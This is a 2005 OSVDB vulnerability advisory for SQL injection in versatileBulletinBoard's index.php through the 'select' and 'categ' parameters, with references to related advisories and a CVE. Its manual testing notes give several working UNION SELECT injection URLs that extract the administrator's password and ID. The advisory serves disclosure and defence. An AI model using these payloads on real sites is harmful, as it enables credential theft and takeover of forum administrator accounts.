versatileBulletinBoard (vBB) index.php Multiple Variable SQL Injection

2005-10-10T08:19:48
ID OSVDB:19964
Type osvdb
Reporter rgod(retrogod@aliceposta.it)
Modified 2005-10-10T08:19:48

Description

Vulnerability Description

versatileBulletinBoard (vBB) contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the index.php script not properly sanitizing user-supplied input to the 'select' or 'categ' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.

Technical Description

This vulnerability is only present when the magic_quotes_gpc PHP option is 'off'.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

versatileBulletinBoard (vBB) contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the index.php script not properly sanitizing user-supplied input to the 'select' or 'categ' variable. This may allow an attacker to inject or manipulate SQL queries in the backend database.

Manual Testing Notes

http://[target]/[path]/index.php?target=viewmesg&select='UNION%20SELECT%20pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass,pass%20FROM%20vbb_user%20where%20name='[admin_nickname]'/ * http://[target]/[path]/index.php?target=viewmesg&select='UNION%20SELECT%20ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID,ID%20FROM%20vbb_user%20where%20name='[admin_nickname]'/ http://[target]/[path]/index.php?target=forum&categ='UNION%20SELECT%200,0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/ http://[target]/[path]/index.php?target=forum&categ='UNION%20SELECT%200,0,ID,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/ http://[target]/[path]/index.php?target=profile&select='UNION%20SELECT%200,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20FROM%20vbb_user%20where%20name='[admin_nickname]'/

References:

Vendor URL: http://vbb.eniki.de/ Secunia Advisory ID:17174 Related OSVDB ID: 19966 Related OSVDB ID: 19962 Related OSVDB ID: 19963 Related OSVDB ID: 19967 Related OSVDB ID: 19972 Related OSVDB ID: 19969 Related OSVDB ID: 19970 Related OSVDB ID: 19965 Related OSVDB ID: 19968 Related OSVDB ID: 19971 Related OSVDB ID: 19973 Other Advisory URL: http://rgod.altervista.org/versatile100RC2.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-10/0120.html CVE-2005-3259 Bugtraq ID: 15068